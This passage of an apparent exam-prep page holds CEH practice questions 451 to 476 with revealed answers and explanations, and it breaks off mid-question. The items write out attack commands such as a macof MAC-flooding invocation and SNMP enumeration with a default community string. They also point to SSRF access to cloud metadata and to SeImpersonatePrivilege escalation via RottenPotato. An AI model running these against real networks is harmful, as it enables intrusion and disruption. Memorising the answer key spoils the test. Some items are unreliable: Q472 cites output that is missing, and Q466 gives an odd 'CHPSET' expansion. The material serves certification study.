Courseiva

Certified Ethical Hacker CEH (CEH) — Questions 451–525

913 questions total · 13pages · All types, answers revealed

Page 6

Page 7 of 13

Page 8
451
MCQeasy

A security analyst wants to gather information about a target domain using publicly available sources without directly interacting with the target’s systems. Which type of reconnaissance is being performed?

A.Vulnerability scanning
B.Social engineering
C.Active reconnaissance
D.Passive reconnaissance
AnswerD

Passive reconnaissance gathers information solely from publicly available sources, such as search engines, WHOIS records and cached pages, without sending any traffic to the target's systems. This satisfies the stem's constraint of no direct interaction, unlike active reconnaissance, which probes the target and risks detection.

Why this answer

Passive reconnaissance involves collecting information about a target from publicly available sources without sending any packets or making direct contact with the target's systems. This approach relies on open-source intelligence (OSINT) such as WHOIS records, DNS lookups, search engines, and social media, ensuring no footprint is left on the target's network.

Exam trap

The trap here is confusing passive reconnaissance with active reconnaissance; candidates often think any information gathering is 'active' because it involves tools, but the key distinction is whether the target's systems are directly contacted (active) or not (passive).

How to eliminate wrong answers

Option A is wrong because vulnerability scanning is an active process that sends probes (e.g., SYN packets, HTTP requests) to identify weaknesses, directly interacting with target systems. Option B is wrong because social engineering involves manipulating people to divulge information, which requires direct interaction (e.g., phishing emails, phone calls) and is not a reconnaissance technique based solely on public sources. Option C is wrong because active reconnaissance involves direct engagement with the target's systems (e.g., port scanning with Nmap, banner grabbing), generating traffic that can be logged or detected.

452
MCQmedium

During a web application test, an analyst intercepts a request containing a 'Referer' header that points to a different domain. The analyst modifies the request by removing the 'Referer' header and the action still executes successfully. Which type of attack is the analyst testing?

A.Server-Side Request Forgery (SSRF)
B.Clickjacking
C.Cross-Site Request Forgery (CSRF)
D.Cross-Site Scripting (XSS)
AnswerC

Cross-Site Request Forgery (CSRF) exploits a user's authenticated session to force their browser to send an unwanted request to a vulnerable web application. A common defense against CSRF involves the server inspecting the HTTP Referer header to verify that the request originated from the application's own domain, preventing requests from external, malicious sites. An analyst successfully bypassing this Referer header check by manipulating or omitting it directly demonstrates a CSRF vulnerability, as the server's origin validation mechanism has been defeated.

Why this answer

CSRF protection often relies on checking the Referer header; if it can be removed or spoofed, the application is vulnerable to CSRF.

453
Multi-Selecthard

Which THREE of the following are correct statements about DNS zone transfers?

Select 3 answers
A.A successful zone transfer reveals all DNS records for the domain
B.The tool dnsrecon can attempt a zone transfer
C.Zone transfers are encrypted by default
D.Zone transfers should be restricted to authorized secondary DNS servers
E.Zone transfers use UDP port 53
AnswersA, B, D

A successful DNS zone transfer (AXFR or IXFR) is designed to replicate the entire DNS zone file from a primary (master) DNS server to a secondary (slave) DNS server. This process inherently exposes all resource records (A, AAAA, MX, NS, SOA, SRV, TXT, etc.) configured for that specific domain. Consequently, an attacker who successfully performs an unauthorized zone transfer gains comprehensive knowledge of the domain's network infrastructure and hosts.

Why this answer

A successful DNS zone transfer (AXFR) returns the complete zone file, which contains all DNS records for the domain, including A, AAAA, MX, CNAME, NS, and TXT records. This is why it is a critical information-gathering step during reconnaissance.

Exam trap

The trap here is that candidates confuse DNS query transport (UDP 53) with zone transfer transport (TCP 53), and assume zone transfers are encrypted by default when they are not.

454
MCQeasy

In the shared responsibility model for cloud computing, which of the following is typically the responsibility of the customer?

A.Physical security of data centers
B.Patch management of the virtualization platform
C.Data classification and encryption of customer data
D.Network infrastructure security (e.g., hypervisor, network cables)
AnswerC

Customers retain full responsibility for classifying their data based on sensitivity and implementing appropriate encryption mechanisms for their data, both at rest and in transit. This is a crucial "security in the cloud" responsibility because only the customer understands the regulatory, compliance, and business impact of their specific data. While the cloud provider offers encryption tools, the customer must configure and manage these data protection controls.

Why this answer

The customer is responsible for data classification and account management, while the provider secures the physical infrastructure.

455
MCQmedium

A security analyst captures WPA2 handshake packets using airodump-ng and then runs aircrack-ng with a wordlist. After several minutes, aircrack-ng reports 'KEY FOUND!' followed by a hex string. Which attack was successfully performed?

A.Dictionary attack on the 4-way handshake
B.Hash length extension attack on the MIC
C.Rainbow table attack on the WPA2 handshake
D.Brute-force attack against the PSK
AnswerA

A dictionary attack is the most practical method for cracking WPA2-PSK when a 4-way handshake has been captured. Tools like Aircrack-ng take a wordlist and for each entry, derive the Pairwise Master Key (PMK) using PBKDF2 with the SSID as a salt. This derived PMK is then used to reconstruct the Message Integrity Code (MIC) from the captured handshake. If the calculated MIC matches the one in the captured handshake, the wordlist entry is confirmed as the correct Pre-Shared Key (PSK).

Why this answer

Running aircrack-ng with a wordlist against a captured WPA2 4-way handshake is a dictionary attack: aircrack-ng computes the PMK/PTK for each candidate passphrase and compares the resulting MIC to the captured handshake. When it reports 'KEY FOUND!', it has matched a passphrase from the wordlist. This is the classic WPA2 PSK cracking workflow.

Exam trap

CEH often tests the distinction between dictionary and brute-force attacks — candidates see 'wordlist' and may still pick brute-force, but a wordlist-based attempt is definitionally a dictionary attack.

How to eliminate wrong answers

Option B is wrong because hash length extension attacks target Merkle–Damgård constructions (e.g., MD5, SHA-1) in MAC schemes, not the WPA2 MIC, which uses HMAC-style keyed hashing with the PTK. Option C is wrong because rainbow tables precompute hashes for a fixed algorithm; WPA2 uses PBKDF2 with the SSID as salt, so a rainbow table would need to be SSID-specific and is not what aircrack-ng does — it computes on the fly. Option D is wrong because a brute-force attack tries every possible character combination, whereas aircrack-ng with a wordlist is by definition a dictionary attack.

456
Multi-Selectmedium

Which TWO of the following are examples of asymmetric cryptography? (Select 2)

Select 2 answers
A.RSA
B.ECC
C.3DES
D.MD5
E.AES
AnswersA, B

RSA (Rivest-Shamir-Adleman) is a foundational asymmetric encryption algorithm that relies on the mathematical difficulty of factoring the product of two large prime numbers. It employs a distinct public key for encryption and a corresponding private key for decryption, enabling secure communication and digital signatures without prior key exchange. This public/private key pair structure is the defining characteristic of asymmetric cryptography, making it a correct example.

Why this answer

RSA and ECC are asymmetric algorithms. AES and 3DES are symmetric. MD5 is a hash function.

457
MCQmedium

A security analyst receives an alert from the IDS indicating a port scan originating from IP 10.0.0.5. Upon investigation, the analyst finds that 10.0.0.5 is a legitimate internal server. Which type of scan is the attacker likely using to evade detection?

A.SYN scan
B.Idle scan
C.Decoy scan
D.Fragmentation scan
AnswerC

A Decoy scan is specifically designed to obscure the true source of a port scan by interspersing the attacker's real IP address with several spoofed IP addresses. The target receives scan packets appearing to originate from multiple hosts simultaneously, including the attacker's actual IP and numerous fake decoys. This technique generates significant noise in IDS logs, making it challenging to distinguish the legitimate attacker from the fabricated sources, potentially flagging one of the decoy IPs as the source.

Why this answer

A decoy scan (option C) is the correct answer because it allows the attacker to blend their real IP address with multiple spoofed IP addresses, making it appear as though the scan originates from several hosts. In this scenario, the IDS alerts on IP 10.0.0.5, which is a legitimate internal server, indicating that the attacker is using that server's IP as a decoy to evade detection and misdirect the analyst's investigation.

Exam trap

The trap here is that candidates often confuse a decoy scan with an idle scan, mistakenly thinking that using a legitimate internal server as a decoy is the same as using a zombie host, but idle scans rely on IP ID side-channel analysis and do not involve spoofing the attacker's own traffic.

How to eliminate wrong answers

Option A is wrong because a SYN scan sends raw SYN packets and does not spoof the source IP; the attacker's real IP would be directly visible in the IDS logs, not a legitimate internal server. Option B is wrong because an idle scan (also known as a zombie scan) uses a third-party host (the zombie) with a predictable IP ID sequence to indirectly probe the target, but the scan traffic appears to come from the zombie, not from a legitimate internal server like 10.0.0.5. Option D is wrong because a fragmentation scan splits TCP headers into multiple small IP fragments to evade simple packet filters, but it does not alter the source IP address, so the attacker's real IP would still be logged.

458
MCQhard

A penetration tester discovers a service running on UDP port 161 with a default community string 'public'. They use `snmpwalk -v2c -c public 192.168.1.10` and retrieve extensive system information. Which enumeration technique is being performed?

A.SMB enumeration
B.LDAP enumeration
C.SMTP enumeration
D.SNMP enumeration
AnswerD

Simple Network Management Protocol (SNMP) is a foundational protocol for managing and monitoring network devices, and it predominantly uses UDP for its operations. SNMP agents typically listen for manager requests on UDP port 161, while managers receive asynchronous notifications (traps and informs) on UDP port 162. Enumeration tools like `snmpwalk` specifically target UDP port 161 to query and retrieve the entire Management Information Base (MIB) tree from compliant devices, confirming its relevance to a service on UDP 161.

Why this answer

The question describes using SNMP (Simple Network Management Protocol) over UDP port 161 with the default community string 'public' and the `snmpwalk` command to retrieve system information. This is a classic SNMP enumeration technique, where an attacker queries MIB (Management Information Base) data to extract details like running processes, user accounts, and network configurations.

Exam trap

The trap here is that candidates may confuse SNMP enumeration with other enumeration techniques because they see 'enumeration' in the question, but the specific use of UDP port 161 and the `snmpwalk` command uniquely identifies SNMP enumeration.

How to eliminate wrong answers

Option A is wrong because SMB enumeration uses TCP ports 139 or 445 and tools like `enum4linux` or `smbclient`, not UDP port 161 or SNMP commands. Option B is wrong because LDAP enumeration uses TCP/UDP port 389 and queries directory services via `ldapsearch`, not SNMP or the `snmpwalk` command. Option C is wrong because SMTP enumeration uses TCP port 25 and commands like `VRFY` or `EXPN` to verify email users, not UDP port 161 or SNMP protocols.

459
MCQeasy

A security analyst captures a large number of initialization vectors (IVs) on a WEP-protected network. Which tool is most commonly used to crack the WEP key using IVs?

A.Aircrack-ng
B.Reaver
C.Kismet
D.John the Ripper
AnswerA

Aircrack-ng is specifically engineered to exploit the cryptographic weaknesses inherent in the WEP protocol, primarily by collecting a sufficient number of Initialization Vectors (IVs). It leverages statistical attacks, such as the FMS attack, to deduce the WEP key from patterns observed in these IVs, which are often reused or predictable due to WEP's design flaws. The tool then performs a brute-force or dictionary attack on the derived key space, making it highly effective when a large volume of IVs has been captured.

Why this answer

Aircrack-ng is the standard tool for cracking WEP keys by capturing IVs. Reaver is for WPS, Kismet is a sniffer, and John the Ripper is a general password cracker.

460
MCQmedium

An attacker has gained initial access to a Windows system and wants to escalate privileges to SYSTEM. They find that the SeImpersonatePrivilege is enabled for their current user. Which tool or technique is specifically designed to leverage this privilege for elevation?

A.Token impersonation using RottenPotato
B.Pass-the-hash attack
C.Kerberoasting
D.SUID abuse
AnswerA

Token impersonation using RottenPotato is a highly effective local privilege escalation technique on Windows systems. It exploits the `SeImpersonatePrivilege`, often held by services like IIS or SQL Server, by leveraging NTLM relay attacks against local COM/DCOM services. This allows an attacker to trick a privileged process, typically running as `NT AUTHORITY\SYSTEM`, into authenticating to a malicious listener, enabling the attacker to impersonate the resulting SYSTEM token and gain full administrative control.

Why this answer

The SeImpersonatePrivilege allows a process to impersonate a user after obtaining a token. RottenPotato (and its variants like JuicyPotato) exploits this privilege by forcing a high-integrity service (e.g., DCOM or RPC) to authenticate to a malicious server under the attacker's control, capturing a SYSTEM-level token and using it to execute code with elevated privileges.

Exam trap

EC-Council often tests the distinction between Windows token impersonation attacks (SeImpersonatePrivilege) and Linux SUID abuse, leading candidates to mistakenly select SUID abuse when the question explicitly mentions a Windows system.

How to eliminate wrong answers

Option B (Pass-the-hash) is wrong because it reuses NTLM hashes to authenticate as another user over the network, not to escalate from a local user to SYSTEM via token impersonation. Option C (Kerberoasting) is wrong because it targets service account Kerberos tickets for offline cracking, requiring domain credentials and not leveraging SeImpersonatePrivilege. Option D (SUID abuse) is wrong because it is a Linux/Unix privilege escalation technique involving set-user-ID executables, not applicable to Windows token manipulation.

461
MCQmedium

A penetration tester runs `nbtstat -A 192.168.1.10` on a Windows machine. The output reveals the NetBIOS name table and shows a <20> entry. What does this indicate?

A.The target is a printer
B.The target is a file server
C.The target is a domain controller
D.The target is a workstation
AnswerB

The NetBIOS suffix <20> (hexadecimal) is specifically registered by a computer running the Server service, which is fundamentally responsible for sharing files and printers over the network. When `nbtstat -a` reveals a <20> entry for a target IP address, it strongly indicates that the machine is configured to act as a file server, making its shared resources available to other network clients. This is the definitive indicator for a file server role.

Why this answer

The <20> entry in the NetBIOS name table indicates that the target machine is running the File Server service, which is a NetBIOS service type for file sharing. The `nbtstat -A` command queries the remote NetBIOS name table, and the <20> hex code specifically maps to the 'File Server Service' (also known as the 'Server' service) in the NetBIOS naming convention, as defined in RFC 1001/1002. This service is essential for SMB-based file sharing, making the target a file server.

Exam trap

The trap here is that candidates often confuse the <20> entry with a general 'server' role, but the CEH exam specifically tests the mapping of NetBIOS suffixes to services, where <20> uniquely identifies the File Server Service, not a domain controller or workstation.

How to eliminate wrong answers

Option A is wrong because a printer typically has a <20> entry for the 'File Server Service' only if it also shares files, but the standard NetBIOS code for a printer is <00> or <03> for the workstation service, not <20>. Option C is wrong because a domain controller would show additional entries like <1C> (Domain Controller) or <1B> (Domain Master Browser), not just <20>. Option D is wrong because a workstation primarily has a <00> entry for the Workstation Service, not a <20> entry, which is specific to the Server Service for file sharing.

462
MCQhard

During a penetration test, you run the command: 'macof -i eth0 -s 192.168.1.1 -d 192.168.2.1 -e 00:11:22:33:44:55'. What is the intended effect of this command?

A.Execute a SYN flood against the target
B.Perform MAC flooding to cause switch to fail open
C.Perform ARP poisoning
D.Spoof DNS responses
AnswerB

The command macof -i eth0 specifically performs MAC flooding by continuously sending frames with randomly generated source MAC addresses to exhaust the switch's Content Addressable Memory (CAM) table. When the CAM table overflows, the switch typically enters a "fail-open" mode, behaving like a hub by broadcasting all incoming traffic out of all ports. This allows an attacker connected to any port on the switch to capture and analyze all network traffic, effectively bypassing the switch's normal segmentation.

Why this answer

The `macof` tool generates a flood of random MAC addresses on the specified interface, overwhelming the switch's Content Addressable Memory (CAM) table. When the CAM table is full, the switch fails open and begins flooding all frames out all ports, effectively turning it into a hub. This allows the attacker to sniff traffic that would normally be isolated to specific switch ports.

Exam trap

The trap here is confusing MAC flooding (which targets the switch's CAM table) with ARP poisoning (which targets the ARP cache of hosts), as both involve spoofed MAC addresses but operate at different layers and with different mechanisms.

How to eliminate wrong answers

Option A is wrong because `macof` performs MAC flooding, not a SYN flood; a SYN flood targets a host's TCP stack with half-open connections, whereas `macof` targets the switch's CAM table. Option C is wrong because ARP poisoning involves sending forged ARP replies to associate a victim's IP with the attacker's MAC, which is a different attack vector than flooding the switch with random MACs. Option D is wrong because DNS spoofing requires corrupting DNS responses or cache entries, which is unrelated to the layer-2 MAC flooding performed by `macof`.

463
MCQmedium

An IoT device uses the MQTT protocol without TLS. An attacker on the same network subscribes to all topics and captures messages. What is the MOST significant security risk?

A.Firmware corruption
B.Denial of service
C.Replay attacks
D.Loss of message confidentiality
AnswerD

The absence of Transport Layer Security (TLS) means that all MQTT communication, including connection requests, published messages, and subscription acknowledgments, is transmitted in cleartext over the network. Any attacker with network access can easily intercept and read these unencrypted messages using packet sniffers. This direct exposure of sensitive data, commands, or telemetry being exchanged between IoT devices and the MQTT broker constitutes an immediate and severe loss of message confidentiality.

Why this answer

MQTT without TLS transmits messages in plaintext, so an attacker subscribing to all topics can read all message payloads. The most significant risk is loss of message confidentiality, as sensitive data (credentials, telemetry) is exposed. While other risks exist, confidentiality loss is the direct and primary impact.

Exam trap

CEH often tests whether candidates focus on integrity or availability risks when the scenario describes passive eavesdropping, where confidentiality is the primary concern.

How to eliminate wrong answers

Option A is wrong because firmware corruption requires write access or exploitation, not just passive message capture. Option B is wrong because denial of service involves disrupting availability, not reading messages. Option C is wrong because replay attacks require capturing and retransmitting messages, which is possible but secondary to the immediate confidentiality breach.

464
MCQmedium

A security analyst notices that a web application's SSL/TLS certificate is issued by a CA that is not trusted by modern browsers. Which type of attack could this enable?

A.Man-in-the-middle attack
B.Downgrade attack
C.Birthday attack
D.Replay attack
AnswerA

A Man-in-the-Middle (MITM) attack occurs when an attacker intercepts communication between two parties, impersonating each to the other. If a client is configured to trust an untrusted or compromised Certificate Authority (CA), an attacker can leverage this trust to issue fraudulent SSL/TLS certificates for legitimate domains. This allows the attacker to decrypt, inspect, and re-encrypt traffic, effectively becoming the "man in the middle" without the client's browser raising certificate warnings, thereby compromising confidentiality and integrity.

Why this answer

Using a self-signed or untrusted CA certificate can allow an attacker to perform a man-in-the-middle attack by presenting their own certificate that the browser may accept with user warning.

465
MCQeasy

Which Burp Suite tool is specifically designed to automate customized attacks against web applications, such as brute-forcing login credentials or fuzzing parameters?

A.Repeater
B.Scanner
C.Intruder
D.Proxy
AnswerC

Burp Intruder is specifically engineered to automate custom, payload-driven attacks against web applications. Users define "payload positions" within a base request, then configure various payload sets and attack types (e.g., Sniper, Battering Ram, Pitchfork) to systematically inject values into those positions. This powerful tool is ideal for brute-forcing, fuzzing, credential stuffing, and other repetitive tasks requiring automated request modification and response analysis.

Why this answer

Burp Intruder is specifically designed to automate customized attacks against web applications, such as brute-forcing login credentials, fuzzing parameters, and enumerating identifiers. It allows testers to configure payloads, attack types, and grep-match rules to analyze responses. This makes it the correct tool for automating repetitive attacks.

Exam trap

CEH often tests the distinction between Burp Intruder (automation) and Scanner (automated vulnerability detection), causing candidates to confuse the two.

How to eliminate wrong answers

Option A is wrong because Repeater is used for manually manipulating and resending individual requests, not for automation. Option B is wrong because Scanner automates vulnerability discovery but does not perform customized brute-force or fuzzing attacks; it uses predefined checks. Option D is wrong because Proxy is an intercepting proxy for capturing and modifying traffic, not for automating attacks.

466
Multi-Selecthard

Which THREE of the following are components of the CHPSET system hacking methodology?

Select 3 answers
A.Port scanning
B.Vulnerability scanning
C.Cracking passwords
D.Privilege escalation
E.Erasing tracks
AnswersC, D, E

Cracking passwords is a critical component of system hacking, often employed to gain initial unauthorized access to a system or to elevate privileges once inside. This involves using various techniques like brute-force, dictionary attacks, or rainbow tables against hashed credentials obtained from a target. Successful password cracking directly facilitates unauthorized authentication, enabling an attacker to impersonate legitimate users and access system resources.

Why this answer

Cracking passwords is a core phase in the CHPSET (Cracking, Hacking, Privilege escalation, System hacking, Erasing tracks, Tunneling) system hacking methodology. After gaining initial access, the attacker extracts password hashes (e.g., from SAM or LSASS) and uses tools like John the Ripper or Hashcat to crack them offline, enabling further access or lateral movement.

Exam trap

The CEH exam often tests candidates by mixing pre-exploitation steps (like scanning) with post-exploitation phases (like cracking and privilege escalation), so the trap is assuming that all enumeration activities are part of the CHPSET methodology, when in fact CHPSET only covers actions after initial access.

467
MCQhard

A penetration tester intercepts the following request using Burp Suite: POST /change_password HTTP/1.1 Host: example.com Cookie: sessionid=abc123; SameSite=Lax Content-Type: application/x-www-form-urlencoded new_password=Hacker123 The tester successfully crafts a CSRF attack by embedding a hidden form in a malicious page. Which mitigation is most likely missing?

A.SameSite=Strict
B.HTTPOnly flag
C.Secure flag
D.CSRF token
AnswerD

A CSRF token is a unique, unpredictable, and secret value generated by the server and included with every state-changing request, typically embedded in hidden form fields or request headers. The server validates this token upon receiving the request, ensuring it matches the token associated with the user's session. Since a malicious attacker operating from a different origin cannot obtain or guess this secret token, they cannot craft a valid forged request that the server would accept, thereby effectively preventing CSRF attacks.

Why this answer

The request shows a session cookie with SameSite=Lax but no anti-CSRF token, and the tester successfully forged a cross-site POST. A CSRF token is the standard defense that binds the request to the user's session and cannot be predicted by an attacker, so its absence is the missing mitigation.

Exam trap

The trap is picking SameSite=Strict as the fix when the scenario already shows Lax and a successful attack — candidates overlook that the token is the canonical CSRF control and that SameSite alone is insufficient.

How to eliminate wrong answers

Option A is wrong because SameSite=Strict would block the cookie on cross-site requests, but the attack succeeded with Lax — and Lax already blocks most cross-site POSTs, so the real gap is the missing token. Option B is wrong because HTTPOnly prevents JavaScript from reading the cookie, which mitigates XSS-based theft, not CSRF. Option C is wrong because the Secure flag only ensures the cookie is sent over HTTPS, which does not prevent CSRF.

468
Multi-Selectmedium

A security analyst identifies that a web application is vulnerable to Server-Side Request Forgery (SSRF). Which TWO of the following are effective mitigation techniques for SSRF?

Select 2 answers
A.Disable unnecessary URL schemas (e.g., file://, dict://)
B.Use a blacklist to block private IP ranges
C.Increase the timeout for HTTP requests
D.Implement an allowlist of permitted URLs or IP addresses
E.Encode user input in base64 before passing to URL functions
AnswersA, D

Disabling unnecessary URL schemas, such as `file://`, `dict://`, `gopher://`, or `ftp://`, is a crucial mitigation for Server-Side Request Forgery (SSRF). By restricting the protocols the server can use to make outbound requests, the attack surface is significantly reduced. This prevents attackers from leveraging the vulnerability to access local files, perform port scanning, or interact with internal services using non-HTTP protocols, thereby blocking common exploitation vectors.

Why this answer

Option A is correct because restricting or disabling dangerous URL schemas such as file://, dict://, gopher://, and ftp:// prevents an attacker from abusing the server's URL-fetching functionality to read local files or interact with non-HTTP services, which is a core SSRF exploitation vector. Option D is correct because an allowlist (positive validation) of permitted domains, URLs, or IP addresses ensures the application only makes requests to explicitly trusted destinations, which is the most robust defense against SSRF since it rejects all unapproved targets by default. Option B is not ideal because blacklisting private IP ranges is easily bypassed using techniques such as decimal/octal/hex IP encoding, DNS rebinding, IPv6-mapped addresses, or redirects, so it is considered a weak mitigation rather than an effective one.

Option C is incorrect because increasing HTTP request timeouts only affects how long the server waits for a response and does nothing to prevent SSRF requests from being made. Option E is incorrect because base64-encoding user input does not validate or restrict the destination; the server would still decode and process the URL, so the SSRF vulnerability remains exploitable.

Exam trap

CEH often tests the misconception that blacklisting private IPs is sufficient, but allowlisting and schema restrictions are more robust mitigations.

469
MCQeasy

An organization experiences a DDoS attack where a large volume of DNS queries with spoofed source IPs are sent to open DNS resolvers, which then amplify the traffic to the victim. Which type of attack is this?

A.UDP flood
B.Smurf attack
C.SYN flood
D.DNS amplification
AnswerD

Attackers send DNS queries with spoofed source addresses to open resolvers; the resolvers return large responses to the victim, multiplying traffic volume. This reflection-and-amplification mechanism, exploiting the size disparity between query and response, matches the stem exactly.

Why this answer

This is a DNS amplification attack, a type of DDoS that exploits open DNS resolvers. The attacker sends a small DNS query (e.g., ANY type) with a spoofed source IP (the victim's IP) to an open resolver, which responds with a much larger response (up to 50-100x the query size), flooding the victim. The key mechanism is the amplification factor combined with the spoofed source address, which directs the amplified traffic to the victim.

Exam trap

In EC-CEH, candidates often mistake DNS amplification for a basic UDP flood or Smurf attack. The key is to recognize the involvement of an open DNS resolver and the amplification factor, which are hallmarks of this attack.

How to eliminate wrong answers

Option A is wrong because a UDP flood is a generic attack where the attacker directly sends a high volume of UDP packets to the victim, without using a third-party reflector or amplification; this scenario specifically involves open DNS resolvers amplifying traffic. Option B is wrong because a Smurf attack uses ICMP echo requests sent to a broadcast address with a spoofed source IP, causing all hosts on the network to reply to the victim; this attack uses DNS queries, not ICMP, and targets open resolvers, not broadcast addresses. Option C is wrong because a SYN flood exploits the TCP three-way handshake by sending many SYN packets with spoofed IPs to exhaust server resources; this attack uses UDP-based DNS queries, not TCP SYN packets.

470
MCQmedium

An analyst uses the following command to capture traffic: tcpdump -i eth0 -w capture.pcap host 10.0.0.5 and port 80. After generating traffic from a web server at 10.0.0.5, the analyst examines the pcap with Wireshark. What type of traffic will appear in the capture?

A.All HTTP traffic on the network
B.HTTP traffic to and from 10.0.0.5
C.Only HTTP traffic originating from 10.0.0.5
D.All traffic from 10.0.0.5 on any port
AnswerB

The "host 10.0.0.5" filter inherently captures traffic where 10.0.0.5 is either the source or the destination IP address, encompassing both inbound and outbound communications. Coupled with "port 80", which identifies standard HTTP traffic, this command precisely targets all HTTP conversations involving the specified host, regardless of direction.

Why this answer

The command `tcpdump -i eth0 -w capture.pcap host 10.0.0.5 and port 80` captures only packets that match both conditions: the IP address is 10.0.0.5 (source or destination) and the port is 80 (source or destination). Since port 80 is the default HTTP port, this filter captures HTTP traffic to and from the web server at 10.0.0.5. The `host` keyword includes both directions, so the capture is not limited to traffic originating from the server.

Exam trap

The trap here is that candidates often assume `host` implies only traffic originating from the specified IP, but in BPF syntax, `host` captures bidirectional traffic unless modified with `src` or `dst`.

How to eliminate wrong answers

Option A is wrong because the filter restricts traffic to host 10.0.0.5 and port 80, not all HTTP traffic on the network; other hosts' HTTP traffic would be excluded. Option C is wrong because the `host` keyword captures traffic in both directions (to and from 10.0.0.5), not only traffic originating from that IP; the filter does not specify a source-only modifier like `src`. Option D is wrong because the filter includes `port 80`, which limits traffic to that specific port; traffic from 10.0.0.5 on any other port (e.g., SSH on port 22) would not be captured.

471
MCQhard

A system administrator notices unusual outbound traffic from a server on port 4444. The server has no legitimate service listening on that port. A malware analyst runs 'strings' on a suspicious binary and finds a reference to 'cmd.exe /c' and an IP address. What type of malware is MOST likely present?

A.Worm
B.Keylogger
C.Backdoor Trojan
D.Ransomware
AnswerC

A Backdoor Trojan is malware disguised as legitimate software that, once executed, creates a covert entry point into a compromised system, bypassing normal authentication mechanisms. The "unusual outbound traffic" combined with the execution of `cmd.exe /c` on a non-standard port like 4444 is a classic indicator of a Remote Access Trojan (RAT) or backdoor establishing a command-and-control (C2) channel. This setup allows an attacker to remotely issue commands and control the compromised machine, aligning perfectly with the observed remote shell activity.

Why this answer

The outbound traffic on port 4444, a common port for the Metasploit Meterpreter reverse shell, combined with the 'strings' output showing 'cmd.exe /c' (a command shell invocation) and an IP address, indicates a backdoor Trojan. This malware type establishes a covert reverse connection to an attacker's command-and-control server, allowing remote shell access without a legitimate service on the target port.

Exam trap

The trap here is that candidates may associate port 4444 with legitimate services like Kerberos or Blizzard games, but CEH expects you to recognize it as the default Metasploit reverse shell port, not a worm or ransomware indicator.

How to eliminate wrong answers

Option A is wrong because a worm self-propagates across networks without requiring a manual trigger or a specific reverse shell payload, and it typically uses exploit vectors like SMB or RDP, not a static outbound connection on port 4444. Option B is wrong because a keylogger captures keystrokes locally and sends logs via HTTP or SMTP, not by spawning 'cmd.exe /c' for interactive remote shell access. Option D is wrong because ransomware encrypts files and demands payment, often using HTTPS for C2 communication, not a raw TCP reverse shell on port 4444 with a command-line interface.

472
MCQeasy

What can be inferred from the output?

A.The domain has two mail servers with different priority levels.
B.The command failed because the DNS server is unreachable.
C.The domain uses SPF records to prevent email spoofing.
D.The domain's web server IP address is 192.168.1.1.
AnswerA

The output from a DNS query for MX records explicitly shows multiple entries, each specifying a mail exchanger (mail server) and an associated preference value. These preference values, such as 10 and 20, dictate the order in which sending mail servers should attempt delivery, with lower numbers indicating higher priority. This configuration confirms the existence of two distinct mail servers and establishes a prioritized delivery mechanism, providing both redundancy and a defined failover sequence for incoming email.

Why this answer

The output shows two MX records for the domain, each with a different priority value (e.g., 10 and 20). Lower priority numbers indicate higher preference, so the mail server with priority 10 is tried first, and the one with priority 20 is a backup. This directly indicates the domain has two mail servers with different priority levels, which is exactly what MX records are designed to convey.

Exam trap

The trap here is that candidates may confuse MX records with other DNS record types (like A or TXT) and incorrectly infer unrelated information such as SPF usage or web server IPs, or assume the command failed when it clearly succeeded.

How to eliminate wrong answers

Option B is wrong because the command successfully returned MX records, proving the DNS server is reachable and the query did not fail. Option C is wrong because SPF records are stored as TXT records, not MX records, and the output only shows MX records, so no inference about SPF can be made. Option D is wrong because MX records contain mail server hostnames and their IP addresses are resolved separately via A or AAAA records; the output does not show any web server IP address, and 192.168.1.1 is a private IP that would not appear in public DNS for a domain's web server.

473
MCQhard

During an IoT assessment, a tester examines a smart thermostat that uses the MQTT protocol. The tester finds that the device connects to a broker without any authentication. Which of the following attacks is MOST likely to succeed?

A.Publishing arbitrary messages to control the device and subscribing to data topics
B.Firmware extraction via UART
C.Reversing the firmware to find hardcoded credentials
D.Performing a dictionary attack on the Wi-Fi PSK
AnswerA

If the smart thermostat utilizes an unauthenticated MQTT broker, an attacker can directly publish arbitrary control commands (e.g., set temperature, change mode) to the device's designated topic. Concurrently, subscribing to the device's telemetry topics allows the attacker to intercept sensitive data like temperature readings, occupancy status, or operational logs. This demonstrates both device control compromise and data exfiltration without requiring any prior authentication or credentials, making it a primary and immediate vulnerability in many IoT deployments.

Why this answer

Without authentication on MQTT, an attacker can publish malicious commands (e.g., change temperature) and subscribe to all topics to eavesdrop on sensor data.

474
MCQhard

A penetration tester discovers that a cloud application is vulnerable to Server-Side Request Forgery (SSRF). Which of the following is a potential impact of this vulnerability?

A.Cross-site scripting (XSS) in the browser
B.Remote code execution via command injection
C.Access to cloud instance metadata
D.SQL injection in the database
AnswerC

Cloud providers expose internal metadata services (e.g., AWS EC2 metadata service at `http://169.254.169.254/latest/meta-data/`) that contain highly sensitive information about the instance, including temporary security credentials, instance roles, and network configurations. An SSRF vulnerability allows an attacker to force the vulnerable server to make requests to this internal, unauthenticated endpoint. This enables the exfiltration of critical data, such as IAM role credentials, which can lead to significant compromise and privilege escalation within the cloud environment.

Why this answer

SSRF allows the attacker to make requests from the server, potentially accessing internal services like metadata endpoints (e.g., http://169.254.169.254) that are not publicly accessible.

475
MCQmedium

A network administrator receives an alert that the switch's CAM table is full, causing the switch to flood frames out all ports. Which attack has likely occurred?

A.DNS spoofing
B.ARP poisoning
C.MAC flooding
D.SYN flood
AnswerC

MAC flooding overwhelms the switch's CAM table by sending numerous frames with spoofed source MAC addresses, exhausting its finite entry capacity. Once full, the switch cannot map addresses to ports and falls back to hub-like behaviour, flooding every frame out all ports — precisely the alert described in the stem.

Why this answer

MAC flooding (Option C) is the correct answer because it directly exploits the limited size of a switch's Content Addressable Memory (CAM) table. By sending a high volume of frames with unique, spoofed source MAC addresses, the attacker fills the CAM table, forcing the switch to fail open and flood all incoming frames out every port, effectively turning it into a hub. This allows the attacker to capture traffic that was not originally destined for their port.

Exam trap

In the EC-CEH exam, MAC flooding is often contrasted with ARP poisoning; the trap here is that candidates confuse the layer-2 CAM table overflow with layer-3 ARP cache manipulation, but ARP poisoning does not cause the switch to flood frames out all ports.

How to eliminate wrong answers

Option A is wrong because DNS spoofing corrupts DNS resolution by injecting false A or AAAA records, redirecting users to malicious sites; it does not affect the switch's CAM table or cause frame flooding. Option B is wrong because ARP poisoning manipulates the IP-to-MAC mapping in a host's ARP cache to intercept traffic, but it does not fill the switch's CAM table; the switch still learns and forwards frames normally based on its CAM table entries. Option D is wrong because a SYN flood is a denial-of-service attack that exhausts a target's TCP connection resources by sending incomplete handshake requests; it has no impact on the switch's layer-2 forwarding table.

476
MCQmedium

A security analyst observes a gradual increase in network traffic from an internal host to an external IP address on port 443, with the host also connecting to a known command-and-control (C2) domain. Which type of malware is MOST likely responsible?

A.Ransomware
B.Worm
